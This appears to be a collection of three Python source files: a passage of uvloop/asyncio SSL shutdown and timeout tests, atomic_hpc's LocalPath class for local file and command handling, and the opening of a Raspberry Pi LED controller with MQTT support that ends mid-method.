TIMEOUT = 10.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
await writer.drain()
writer.close()
with self.assertRaisesRegex(asyncio.TimeoutError,
'SSL shutdown timed out'):
await reader.read()
CNT += 1
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.starttls(client_sslctx)
sock.connect(addr)
sock.send(A_DATA)
data = sock.recv_all(2)
self.assertEqual(data, b'OK')
data = sock.recv(1024)
self.assertEqual(data, b'')
fd = sock.detach()
try:
select.select([fd], [], [], 3)
finally:
os.close(fd)
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = {'ssl_handshake_timeout': SSL_HANDSHAKE_TIMEOUT}
if self.implementation != 'asyncio': # or self.PY38
extras['ssl_shutdown_timeout'] = 0.5
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(
asyncio.gather(*tasks),
TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_shutdown_cleanly(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
sock.starttls(
sslctx,
server_side=True)
data = sock.recv_all(len(A_DATA))
self.assertEqual(data, A_DATA)
sock.send(b'OK')
sock.unwrap()
sock.close()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
self.assertEqual(await reader.read(), b'')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(
asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
def test_write_to_closed_transport(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
def server(sock):
sock.starttls(sslctx, server_side=True)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def unwrap_server(sock):
sock.starttls(sslctx, server_side=True)
while True:
try:
sock.unwrap()
break
except ssl.SSLError as ex:
# Since OpenSSL 1.1.1, it raises "application data after
# close notify"
# Python < 3.8:
if ex.reason == 'KRB5_S_INIT':
break
# Python >= 3.8:
if ex.reason == 'APPLICATION_DATA_AFTER_CLOSE_NOTIFY':
break
raise ex
except OSError as ex:
# OpenSSL < 1.1.1
if ex.errno != 0:
raise
sock.close()
async def client(addr):
nonlocal future
future = self.loop.create_future()
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'I AM WRITING NOWHERE1' * 100)
try:
data = await reader.read()
self.assertEqual(data, b'')
except (ConnectionResetError, BrokenPipeError):
pass
for i in range(25):
writer.write(b'I AM WRITING NOWHERE2' * 100)
self.assertEqual(
writer.transport.get_write_buffer_size(), 0)
await future
writer.close()
await self.wait_closed(writer)
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self._silence_eof_received_warning():
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
with self.tcp_server(run(unwrap_server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_flush_before_shutdown(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CHUNK = 1024 * 128
SIZE = 32
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
sslctx_openssl = openssl_ssl.Context(openssl_ssl.TLSv1_2_METHOD)
if hasattr(openssl_ssl, 'OP_NO_SSLV2'):
sslctx_openssl.set_options(openssl_ssl.OP_NO_SSLV2)
sslctx_openssl.use_privatekey_file(self.ONLYKEY)
sslctx_openssl.use_certificate_chain_file(self.ONLYCERT)
client_sslctx = self._create_client_ssl_context()
if hasattr(ssl, 'OP_NO_TLSv1_3'):
client_sslctx.options |= ssl.OP_NO_TLSv1_3
future = None
def server(sock):
sock.starttls(sslctx, server_side=True)
self.assertEqual(sock.recv_all(4), b'ping')
sock.send(b'pong')
time.sleep(0.5) # hopefully stuck the TCP buffer
data = sock.recv_all(CHUNK * SIZE)
self.assertEqual(len(data), CHUNK * SIZE)
sock.close()
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
async def client(addr):
nonlocal future
future = self.loop.create_future()
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
sslprotocol = writer.get_extra_info('uvloop.sslproto')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
sslprotocol.pause_writing()
for _ in range(SIZE):
writer.write(b'x' * CHUNK)
writer.close()
sslprotocol.resume_writing()
await self.wait_closed(writer)
try:
data = await reader.read()
self.assertEqual(data, b'')
except ConnectionResetError:
pass
await future
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_remote_shutdown_receives_trailing_data(self):
CHUNK = 1024 * 16
SIZE = 8
count = 0
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
filled = threading.Lock()
eof_received = threading.Lock()
def server(sock):
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
sslobj.do_handshake()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
while True:
try:
data = sslobj.read(4)
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
else:
break
self.assertEqual(data, b'ping')
sslobj.write(b'pong')
sock.send(outgoing.read())
data_len = 0
with filled:
# trigger peer's resume_writing()
incoming.write(sock.recv(65536 * 4))
while True:
try:
chunk = len(sslobj.read(16384))
data_len += chunk
except ssl.SSLWantReadError:
break
# send close_notify but don't wait for response
with self.assertRaises(ssl.SSLWantReadError):
sslobj.unwrap()
sock.send(outgoing.read())
with eof_received:
# should receive all data
while True:
try:
chunk = len(sslobj.read(16384))
data_len += chunk
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
if not incoming.pending:
# EOF received
break
except ssl.SSLZeroReturnError:
break
self.assertEqual(data_len, CHUNK * count)
if self.implementation == 'uvloop':
# Verify that close_notify is received. asyncio is currently
# not guaranteed to send close_notify before dropping off
sslobj.unwrap()
sock.close()
async def client(addr):
nonlocal future, count
future = self.loop.create_future()
with eof_received:
with filled:
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
count = 0
try:
while True:
writer.write(b'x' * CHUNK)
count += 1
await asyncio.wait_for(
asyncio.ensure_future(writer.drain()), 0.5)
except asyncio.TimeoutError:
# fill write backlog in a hacky way for uvloop
if self.implementation == 'uvloop':
for _ in range(SIZE):
writer.transport._test__append_write_backlog(
b'x' * CHUNK)
count += 1
data = await reader.read()
self.assertEqual(data, b'')
await future
writer.close()
await self.wait_closed(writer)
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_connect_timeout_warning(self):
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
addr = s.getsockname()
async def test():
try:
await asyncio.wait_for(
self.loop.create_connection(asyncio.Protocol,
*addr, ssl=True),
0.1)
except (ConnectionRefusedError, asyncio.TimeoutError):
pass
else:
self.fail('TimeoutError is not raised')
with s:
try:
with self.assertWarns(ResourceWarning) as cm:
self.loop.run_until_complete(test())
gc.collect()
gc.collect()
gc.collect()
except AssertionError as e:
self.assertEqual(str(e), 'ResourceWarning not triggered')
else:
self.fail('Unexpected ResourceWarning: {}'.format(cm.warning))
def test_handshake_timeout_handler_leak(self):
if self.implementation == 'asyncio':
# Okay this turns out to be an issue for asyncio.sslproto too
raise unittest.SkipTest()
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen(1)
addr = s.getsockname()
async def test(ctx):
try:
await asyncio.wait_for(
self.loop.create_connection(asyncio.Protocol, *addr,
ssl=ctx),
0.1)
except (ConnectionRefusedError, asyncio.TimeoutError):
pass
else:
self.fail('TimeoutError is not raised')
with s:
ctx = ssl.create_default_context()
self.loop.run_until_complete(test(ctx))
ctx = weakref.ref(ctx)
# SSLProtocol should be DECREF to 0
self.assertIsNone(ctx())
def test_shutdown_timeout_handler_leak(self):
loop = self.loop
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
sock = sslctx.wrap_socket(sock, server_side=True)
sock.recv(32)
sock.close()
class Protocol(asyncio.Protocol):
def __init__(self):
self.fut = asyncio.Future(loop=loop)
def connection_lost(self, exc):
self.fut.set_result(None)
async def client(addr, ctx):
tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx)
tr.close()
await pr.fut
with self.tcp_server(server) as srv:
ctx = self._create_client_ssl_context()
loop.run_until_complete(client(srv.addr, ctx))
ctx = weakref.ref(ctx)
if self.implementation == 'asyncio':
# asyncio has no shutdown timeout, but it ends up with a circular
# reference loop - not ideal (introduces gc glitches), but at least
# not leaking
gc.collect()
gc.collect()
gc.collect()
# SSLProtocol should be DECREF to 0
self.assertIsNone(ctx())
def test_shutdown_timeout_handler_not_set(self):
if self.implementation == 'asyncio':
# asyncio doesn't call SSL eof_received() so we can't run this test
raise unittest.SkipTest()
loop = self.loop
extra = None
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
sock = sslctx.wrap_socket(sock, server_side=True)
sock.send(b'hello')
assert sock.recv(1024) == b'world'
sock.send(b'extra bytes')
# sending EOF here
sock.shutdown(socket.SHUT_WR)
# make sure we have enough time to reproduce the issue
self.assertEqual(sock.recv(1024), b'')
sock.close()
class Protocol(asyncio.Protocol):
def __init__(self):
self.fut = asyncio.Future(loop=loop)
self.transport = None
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
if data == b'hello':
self.transport.write(b'world')
# pause reading would make incoming data stay in the sslobj
self.transport.pause_reading()
else:
nonlocal extra
extra = data
def connection_lost(self, exc):
if exc is None:
self.fut.set_result(None)
else:
self.fut.set_exception(exc)
def eof_received(self):
self.transport.resume_reading()
async def client(addr):
ctx = self._create_client_ssl_context()
tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx)
await pr.fut
tr.close()
# extra data received after transport.close() should be ignored
self.assertIsNone(extra)
with self.tcp_server(server) as srv:
loop.run_until_complete(client(srv.addr))
def test_shutdown_while_pause_reading(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
loop = self.loop
conn_made = loop.create_future()
eof_recvd = loop.create_future()
conn_lost = loop.create_future()
data_recv = False
def server(sock):
sslctx = self._create_server_ssl_context(self.ONLYCERT,
self.ONLYKEY)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
sslobj.do_handshake()
sslobj.write(b'trailing data')
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
if outgoing.pending:
sock.send(outgoing.read())
while True:
try:
self.assertEqual(sslobj.read(), b'') # close_notify
break
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
while True:
try:
sslobj.unwrap()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
self.assertEqual(sock.recv(16384), b'') # socket closed
class Protocol(asyncio.Protocol):
def connection_made(self, transport):
conn_made.set_result(None)
def data_received(self, data):
nonlocal data_recv
data_recv = True
def eof_received(self):
eof_recvd.set_result(None)
def connection_lost(self, exc):
if exc is None:
conn_lost.set_result(None)
else:
conn_lost.set_exception(exc)
async def client(addr):
ctx = self._create_client_ssl_context()
tr, _ = await loop.create_connection(Protocol, *addr, ssl=ctx)
await conn_made
self.assertFalse(data_recv)
tr.pause_reading()
tr.close()
await asyncio.wait_for(eof_recvd, 10)
await asyncio.wait_for(conn_lost, 10)
with self.tcp_server(server) as srv:
loop.run_until_complete(client(srv.addr))
def test_bpo_39951_discard_trailing_data(self):
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
close_notify = threading.Lock()
def server(sock):
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
while True:
try:
sslobj.do_handshake()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
while True:
try:
data = sslobj.read(4)
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
else:
break
self.assertEqual(data, b'ping')
sslobj.write(b'pong')
sock.send(outgoing.read())
with close_notify:
sslobj.write(b'trailing')
sock.send(outgoing.read())
time.sleep(0.5) # allow time for the client to receive
incoming.write(sock.recv(16384))
sslobj.unwrap()
sock.send(outgoing.read())
sock.close()
async def client(addr):
nonlocal future
future = self.loop.create_future()
with close_notify:
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
writer.close()
try:
await self.wait_closed(writer)
except ssl.SSLError as e:
if self.implementation == 'asyncio' and \
'application data after close notify' in str(e):
raise unittest.SkipTest('bpo-39951')
raise
await future
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_first_data_after_wakeup(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
loop = self.loop
this = self
fut = self.loop.create_future()
def client(sock, addr):
try:
sock.connect(addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = client_context.wrap_bio(incoming, outgoing)
# Do handshake manually so that we could collect the last piece
while True:
try:
sslobj.do_handshake()
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(65536))
# Send the first data together with the last handshake payload
sslobj.write(b'hello')
sock.send(outgoing.read())
while True:
try:
incoming.write(sock.recv(65536))
self.assertEqual(sslobj.read(1024), b'hello')
break
except ssl.SSLWantReadError:
pass
sock.close()
except Exception as ex:
loop.call_soon_threadsafe(fut.set_exception, ex)
sock.close()
else:
loop.call_soon_threadsafe(fut.set_result, None)
class EchoProto(asyncio.Protocol):
def connection_made(self, tr):
self.tr = tr
# manually run the coroutine, in order to avoid accidental data
coro = loop.start_tls(
tr, self, server_context,
server_side=True,
ssl_handshake_timeout=this.TIMEOUT,
)
waiter = coro.send(None)
def tls_started(_):
try:
coro.send(None)
except StopIteration as e:
# update self.tr to SSL transport as soon as we know it
self.tr = e.value
waiter.add_done_callback(tls_started)
def data_received(self, data):
# This is a dumb protocol that writes back whatever it receives
# regardless of whether self.tr is SSL or not
self.tr.write(data)
async def run_main():
proto = EchoProto()
server = await self.loop.create_server(
lambda: proto, '127.0.0.1', 0)
addr = server.sockets[0].getsockname()
with self.tcp_client(lambda sock: client(sock, addr),
timeout=self.TIMEOUT):
await asyncio.wait_for(fut, timeout=self.TIMEOUT)
proto.tr.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(run_main())
class Test_UV_TCPSSL(_TestSSL, tb.UVTestCase):
pass
class Test_AIO_TCPSSL(_TestSSL, tb.AIOTestCase):
pass
|
local.py
|
import os
import shutil
from subprocess import Popen, PIPE # , STDOUT
from contextlib import contextmanager
import logging
from threading import Thread
from atomic_hpc.context_folder.abstract import VirtualDir
from atomic_hpc.utils import splitall
# python 3 to 2 compatibility
try:
basestring
except NameError:
basestring = str
try:
import pathlib
except ImportError:
import pathlib2 as pathlib
try:
from queue import Queue
except:
from Queue import Queue
logger = logging.getLogger(__name__)
class LocalPath(VirtualDir):
def __init__(self, root):
"""
Parameters
----------
root: pathlib.Path
"""
self._root = root
if not self._root.exists():
self._root.mkdir(parents=True)
def exists(self, path):
""" whether path exists
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.exists()
def isfile(self, path):
""" whether path is a file
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.is_file()
def isdir(self, path):
""" whether path is a directory
Parameters
----------
path: str
Returns
-------
"""
path = self._root.joinpath(path)
return path.is_dir()
def stat(self, path):
""" Retrieve information about a file
Parameters
----------
path: str
Returns
-------
attr: object
see os.stat, includes st_mode, st_size, st_uid, st_gid, st_atime, and st_mtime attributes
"""
path = self._root.joinpath(path)
return path.stat()
def chmod(self, path, mode):
""" Change the mode (permissions) of a file
Parameters
----------
path: str
mode: int
new permissions (see os.chmod)
Examples
--------
To make a file executable:
cur_mode = folder.stat("exec.sh").st_mode
folder.chmod("exec.sh", cur_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH )
"""
path = self._root.joinpath(path)
return path.chmod(mode)
def makedirs(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("making directories: {}".format(path))
parts = splitall(path)
newpath = self._root.joinpath(parts[0])
if not newpath.exists():
newpath.mkdir()
for part in parts[1:]:
newpath = newpath.joinpath(part)
if not newpath.exists():
newpath.mkdir()
def rmtree(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("removing directories: {}".format(path))
delpath = self._root.joinpath(path)
if self._root.samefile(delpath):
raise IOError("attempting to remove the root directory")
if not delpath.exists():
raise IOError("root doesn't exist: {}".format(path))
if not delpath.is_dir():
raise IOError("root is not a directory: {}".format(path))
for subpath in delpath.glob("**/*"):
if subpath.is_file():
subpath.unlink()
for subpath in reversed(list(delpath.glob("**"))):
subpath.rmdir()
if delpath.exists():
delpath.rmdir()
def remove(self, path):
"""
Parameters
----------
path: str
Returns
-------
"""
logger.debug("removing path: {}".format(path))
delpath = self._root.joinpath(path)
delpath.unlink()
def rename(self, path, newname):
"""
Parameters
----------
path: str
newname: str
Returns
-------
"""
logger.debug("removing path: {0} to {1}".format(path, newname))
path = self._root.joinpath(path)
newname = path.parent.joinpath(newname)
path.rename(newname)
def getabs(self, path):
"""
Parameters
----------
path: str
Returns
-------
abspath: str
"""
path = self._root.joinpath(path)
return str(path.absolute())
@contextmanager
def open(self, path, mode='r', encoding=None):
""" open a file, it will be created if it does not initially exist
Parameters
----------
path: str
mode: str
encoding: str
Returns
-------
"""
logger.debug("opening {0} in mode '{1}'".format(path, mode))
path = self._root.joinpath(path)
if not path.exists():
path.touch()
if not path.is_file():
raise IOError("path is not a file: {}".format(path))
with path.open(mode=mode, encoding=encoding) as f:
yield f
def glob(self, pattern):
""" yield all path that match the pattern in the directory
(not including the root)
Parameters
----------
pattern: str
Yields
-------
path: str
path relative to root
"""
for path in self._root.glob(pattern):
if not path.samefile(self._root):
yield str(path.relative_to(self._root))
def copy(self, inpath, outpath):
""" copy one path to another, where both are internal to the context path
the entire contents of infile will be copied into outpath
Parameters
----------
inpath: str
outpath: str
# contentonly: bool
# if True and inpath is a dir, copy only the content of the inpath, otherwise copy the entire folder
Returns
-------
"""
logger.debug("internally copying {0} to {1}".format(inpath, outpath))
outpath = self._root.joinpath(outpath)
inpath = self._root.joinpath(inpath)
if not inpath.exists():
raise IOError("the inpath does not exist: {}".format(inpath))
if not outpath.exists():
raise IOError("the outpath does not exist: {}".format(outpath))
if hasattr(inpath, "copy_path_obj"):
inpath = inpath.copy_path_obj()
self.copy_from(inpath, os.path.relpath(str(outpath), str(self._root)))
def copy_from(self, source, path):
""" copy from a local source outside the context folder
Parameters
----------
path: str
source: str or path_like
Returns
-------
"""
logger.debug("copying external source {0} to {1}".format(source, path))
subpath = self._root.joinpath(path)
if hasattr(subpath, "copy_from"):
subpath.copy_from(source)
return
source = pathlib.Path(source)
if source.is_file() and source.exists():
shutil.copy(str(source), str(subpath.joinpath(source.name)))
elif source.is_dir() and source.exists():
shutil.copytree(str(source), str(subpath.joinpath(source.name)))
else:
raise IOError("the source is not an existing file or directory: {}".format(source))
def copy_to(self, path, target):
""" copy to a local target outside the context folder
Parameters
----------
path: str
target: str or path_like
Returns
-------
"""
logger.debug("copying {0} to external target to {1}".format(path, target))
subpath = self._root.joinpath(path)
if hasattr(subpath, "copy_to"):
subpath.copy_to(target)
return
target = pathlib.Path(target)
if target.is_file() and target.exists():
shutil.copy(str(subpath), str(target.joinpath(subpath.name)))
elif target.is_dir() and target.exists():
shutil.copytree(str(subpath), str(target.joinpath(subpath.name)))
else:
raise IOError("the target is not an existing file or directory")
@contextmanager
def _exec_in_dir(self, path):
previous_path = os.getcwd()
if hasattr(path, "maketemp"):
with path.maketemp(getoutput=True) as tempdir:
try:
os.chdir(str(tempdir))
yield
finally:
os.chdir(previous_path)
else:
try:
os.chdir(str(path))
yield
finally:
os.chdir(previous_path)
# def exec_cmnd(self, cmnd, path='.', raise_error=False, timeout=None):
# """ perform a command line execution
#
# Parameters
# ----------
# cmnd: str
# path: str
# raise_error: True
# raise error if a non zero exit code is received
# timeout: None or float
# seconds to wait for a pending read/write operation before raising an error
#
# Returns
# -------
# success: bool
#
# """
# logger.debug("executing command in {0}: {1}".format(path, cmnd))
#
# runpath = self._root.joinpath(path)
# runpath.absolute()
# with self._exec_in_dir(runpath):
# # subprocess.run(cmnd, shell=True, check=True)
# process = Popen(cmnd, stdout=PIPE, stderr=PIPE, shell=True)
# with process.stdout as pipe:
# for line in iter(pipe.readline, b''):
# logger.info('{}'.format(line.decode("utf-8").strip()))
# with process.stderr as errpipe:
# for line in iter(errpipe.readline, b''):
# logger.warning('{}'.format(line.decode("utf-8").strip()))
#
# exitcode = process.wait(timeout=timeout) # 0 means success
# if exitcode:
# err_msg = "the following line in caused error code {0}: {1}".format(exitcode, cmnd)
# logger.error(err_msg)
# if raise_error:
# raise RuntimeError(err_msg)
# logging.error(err_msg)
# return False
#
# logger.debug("successfully executed command in {0}: {1}".format(path, cmnd))
# return True
@staticmethod
def _pipe_reader(pipe, name, queue):
try:
with pipe:
for line in iter(pipe.readline, b''):
queue.put((pipe, name, line))
finally:
queue.put(None)
# TODO timeout doesn't work in wait
def exec_cmnd(self, cmnd, path='.', raise_error=False, timeout=None):
""" perform a command line execution
Parameters
----------
cmnd: str
path: str
raise_error: True
raise error if a non zero exit code is received
timeout: None or float
seconds to wait for a pending read/write operation before raising an error
Returns
-------
success: bool
Notes
-----
queuing allows stdout and stderr to output as separate streams, but in (almost) the right order
based on: https://stackoverflow.com/a/31867499/5033292
"""
logger.debug("executing command in {0}: {1}".format(path, cmnd))
security = self.check_cmndline_security(cmnd)
if security is not None:
if raise_error:
raise RuntimeError(security)
logging.error(security)
return False
runpath = self._root.joinpath(path)
runpath.absolute()
with self._exec_in_dir(runpath):
# subprocess.run(cmnd, shell=True, check=True)
process = Popen(cmnd, stdout=PIPE, stderr=PIPE, shell=True, bufsize=1)
q = Queue()
Thread(target=self._pipe_reader, args=[process.stdout, "out", q]).start()
Thread(target=self._pipe_reader, args=[process.stderr, "error", q]).start()
for _ in range(2):
for source, name, line in iter(q.get, None):
if name == "out":
getattr(logger, "exec")(line.decode("utf-8").strip())
elif name == "error":
logger.warning(line.decode("utf-8").strip())
else:
raise ValueError("somethings gone wrong")
exitcode = process.wait() # 0 means success
if exitcode:
err_msg = "the following line in caused error code {0}: {1}".format(exitcode, cmnd)
logger.error(err_msg)
if raise_error:
raise RuntimeError(err_msg)
logging.error(err_msg)
return False
logger.debug("successfully executed command in {0}: {1}".format(path, cmnd))
return True
|
led-controller.py
|
#!/usr/bin/env python3
#vim: ts=4:et:ai:smartindent
# Copyright 2022 Josh Harding
# licensed under the terms of the MIT license, see LICENSE file
# TODO:
# - Allow remote config (e.g. from Hubitat)
# - Save config changes to file
# - Consider other functions like blink(), pulse(), strobe()
from threading import Timer, Event, Thread
from colorzero import Color
from wiringpi import digitalWrite, pwmWrite, pinMode, OUTPUT, PWM_OUTPUT, wiringPiSetupGpio
from datetime import datetime, timedelta
import configparser
import os
import json
HAVE_MQTT = True
try:
import paho.mqtt.client as mqtt
except ImportError:
HAVE_MQTT = False
HAVE_PCA = True
try:
from adafruit_pca9685 import PCA9685
from board import SCL, SDA
import busio
except ImportError:
HAVE_PCA = False
HAVE_REST = True
try:
from flask import Flask, abort
except ImportError:
HAVE_REST = False
# Global config
MAX_LEVEL = 100 # Accept percentages from client
PWM_PIN = 18 # Used if no config file is present
PWM_MAX = 0x0400 # Pi's PWM scale
PCA_MAX = 0xFFFF # 12-bit resolution at the top of a 16-bit register
MIN_STEP_TIME = 0.01 # 100fps is fast enough for me
MIN_STEP_SIZE = MAX_LEVEL/PWM_MAX
# Base class for controlling an LED with a GPIO pin
class LEDPin:
pintype = 'onoff'
def __init__(self, name, pin, level):
self.name = name
self.pin = int(pin)
self._def_level(level)
self.last_on_level = self.level if self.level else 100
self.last_on_timer = None
self.toggling = ''
self._setup_cmds()
self.err_msg = None
self.fade({'level': self.level, 'duration': 0})
self._init_pin()
if 'mqtt' in config.sections():
self._mqtt_listen()
self._setup_complete = False
def _init_pin(self):
pinMode(self.pin, OUTPUT)
def _setup_cmds(self):
self.commands = {
'on' : self.on,
'off' : self.off,
'toggle': self.toggle,
'fade' : self.fade,
}
self.defaults = {
'fade' : [['level', int, 0]],
'on' : [['duration', float, 1]],
'off' : [['level', int, 0], ['duration', float, 1]],
}
def _def_level(self, level):
self.level = 1 if level == 'on' else 0
def _mqtt_listen(self):
if HAVE_MQTT:
self.topic = f"cmd/{config['mqtt'].get('topic','led')}/{self.name}"
self._mqtt_setup()
def _mqtt_setup(self):
self.client = mqtt.Client()
self.client.on_connect = self._mqtt_connect
self.client.on_message = self._mqtt_message
self.client.connect(config['mqtt'].get('broker', 'mqtt-broker'))
self.client.loop_start()
def _mqtt_connect(self, client, userdata, flags, rc):
print(f"MQTT subscribing to topic {self.topic}/req")
self.client.subscribe(f"{self.topic}/req")
# At startup, get our most recent state from the broker
if not self._setup_complete:
self.client.subscribe(f"{self.topic}/resp")
def _mqtt_message(self, client, userdata, msg):
self.err_msg = None
if not self._setup_complete and msg.topic == f"{self.topic}/resp":
self._restore_state(msg)
try:
data = json.loads(msg.payload)
if data['cmd'] in self.commands:
self._set_default_args_mqtt(data)
self.prev_status = self._get_status()
self.commands[data['cmd']](data)
self.send_status()
else:
print(f"Unknown command {data['cmd']}, ignoring")
except json.JSONDecodeError:
self.err_msg = 'non-json data'
except KeyError:
self.err_msg = 'missing or invalid cmd'
def _restore_state(self, msg):
data = json.loads(msg.payload)
try:
if hasattr(self, 'color') and 'color' in data:
self.color = Color(data['color'])
if 'level' in data:
self.level = data['level']
if 'duration' not in data:
data['duration'] = 1
print(f"Restoring previous state of {self.name}: {data}")
self.fade(data)
except Exception as e:
print(f"{self.name}._restore_state({data}): {e}")
self._setup_complete = True
self.client.unsubscribe(f"{self.topic}/resp")
def _set_default_args_mqtt(self, data):
cmd=data['cmd']
if cmd in self.defaults:
for setting in self.defaults[cmd]:
name, datatype, value = setting
if name not in data:
data[name] = datatype(value)
def _set_default_args_rest(self, data, args=[]):
cmd=data['cmd']
if cmd in self.defaults:
for i in range(len(self.defaults[cmd])):
name, datatype, value = self.defaults[cmd][i]
data[name] = datatype(value if args[i] == None else args[i])
def on(self):
self.level = 1
self.toggling = ''
self._set_level()
def off(self):
self.level = 0
self.toggling = ''
self._set_level()
def toggle(self, data=None):
if self.toggling == 'on' or self.level:
self.toggling = 'off'
self.off(data)
else:
self.toggling = 'on'
self.on(data)
def fade(self, data):
self.level = round(data['level'])
self._set_level()
def _set_level(self):
self._log_level()
digitalWrite(self.pin, self.level)
def _log_level(self):
print(f'{datetime.now()}: {self.name} level={self.level}')
def _get_status(self):
return {
'level' : self.level,
'switch': 'on' if self.level else 'off',
}
def send_status(self):
